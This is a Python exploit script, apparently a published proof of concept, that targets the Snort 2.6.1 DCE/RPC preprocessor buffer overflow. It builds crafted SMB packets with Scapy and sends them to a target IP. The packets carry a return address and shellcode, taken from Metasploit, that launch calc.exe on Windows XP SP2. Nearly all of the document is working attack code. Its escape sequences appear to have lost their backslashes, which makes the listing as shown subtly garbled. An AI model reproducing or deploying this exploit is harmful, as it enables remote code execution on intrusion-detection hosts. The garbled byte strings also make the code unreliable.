#!/usr/bin/python # # Snort DCE/RPC Preprocessor Buffer Overflow (Command Execution Version) # # Author: Trirat Puttaraksa <trir00t [at] gmail.com> # # http://sf-freedom.blogspot.com # ###################################################### # For educational purpose only # # This exploit call calc.exe on Windows XP SP2 + Snort 2.6.1 # # Note: this exploit use Scapy (http://www.secdev.org/projects/scapy/) # to inject the packet, so you have to install Scapy before use it. # ####################################################### import sys from scapy import * from struct import pack conf.verb = 0 # NetBIOS Session Service payload = \"x00x00x02xab\" # SMB Header payload += \"xffx53x4dx42x75x00x00x00x00x18x07xc8x00x00\" payload += \"x00x00x00x00x00x00x00x00x00x00x00x00xffxfe\" payload += \"x00x08x30x00\" # Tree Connect AndX Request payload += \"x04xa2x00x52x00x08x00x01x00x27x00x00\" payload += \"x5cx00x5cx00x49x00x4ex00x53x00x2dx00x4bx00x49x00\" payload += \"x52x00x41x00x5cx00x49x00x50x00x43x00x24x00x00x00\" payload += \"x3fx3fx3fx3fx3fx00\" # NT Create AndX Request payload += \"x18x2fx00x96x00x00x0ex00x16x00x00x00x00x00x00x00\" payload += \"x9fx01x02x00x00x00x00x00x00x00x00x00x00x00x00x00\" payload += \"x03x00x00x00x01x00x00x00x40x00x40x00x02x00x00x00\" payload += \"x01x11x00x00x5cx00x73x00x72x00x76x00x73x00x76x00\" payload += \"x63x00x00x00\" # Write AndX Request #1 payload += \"x0ex2fx00xfex00x00x40x00x00x00x00xffxffxffxffx80\" payload += \"x00x48x00x00x00x48x00xb6x00x00x00x00x00x49x00xee\" #payload += \"x05x00x0bx03x10x00x00x00xffx01x00x00x01x00x00x00\" payload += \"x05x00x0bx03x10x00x00x00x10x02x00x00x01x00x00x00\" payload += \"xb8x10xb8x10x00x00x00x00x01x00x00x00x00x00x01x00\" payload += \"xc8x4fx32x4bx70x16xd3x01x12x78x5ax47xbfx6exe1x88\" payload += \"x03x00x00x00x04x5dx88x8axebx1cxc9x11x9fxe8x08x00\" payload += \"x2bx10x48x60x02x00x00x00\" # Write AndX Request #2 payload += \"x0exffx00xdexdex00x40x00x00x00x00xffxffxffxffx80\" payload += 
\"x00x48x00x00x00xffx01xcex01x00x00x00x00x49x00xee\" # 0x7c941eed -> jmp esp; make stack happy; windows/exec calc.exe (metasploit.com) payload += \"xedx1ex94x7cx90x81xc4xffxefxffxffx44\" payload += \"x31xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9\" payload += \"xd1x80xf5x83xebxfcxe2xf4x55x39xc4xf5xa9xd1x0bxb0\" payload += \"x95x5axfcxf0xd1xd0x6fx7exe6xc9x0bxaax89xd0x6bxbc\" payload += \"x22xe5x0bxf4x47xe0x40x6cx05x55x40x81xaex10x4axf8\" payload += \"xa8x13x6bx01x92x85xa4xf1xdcx34x0bxaax8dxd0x6bx93\" payload += \"x22xddxcbx7exf6xcdx81x1ex22xcdx0bxf4x42x58xdcxd1\" payload += \"xadx12xb1x35xcdx5axc0xc5x2cx11xf8xf9x22x91x8cx7e\" payload += \"xd9xcdx2dx7exc1xd9x6bxfcx22x51x30xf5xa9xd1x0bx9d\" payload += \"x95x8exb1x03xc9x87x09x0dx2ax11xfbxa5xc1xafx58x17\" payload += \"xdaxb9x18x0bx23xdfxd7x0ax4exb2xe1x99xcaxffxe5x8d\" payload += \"xccxd1x80xf5\" payload += \"x90\" # padding if len(sys.argv) != 2: print \"Usage snort_execute_dcerpc.py <fake destination ip>\" sys.exit(1) target = sys.argv[1] p = IP(dst=target) / TCP(sport=1025, dport=139, flags=\"PA\") / payload send(p)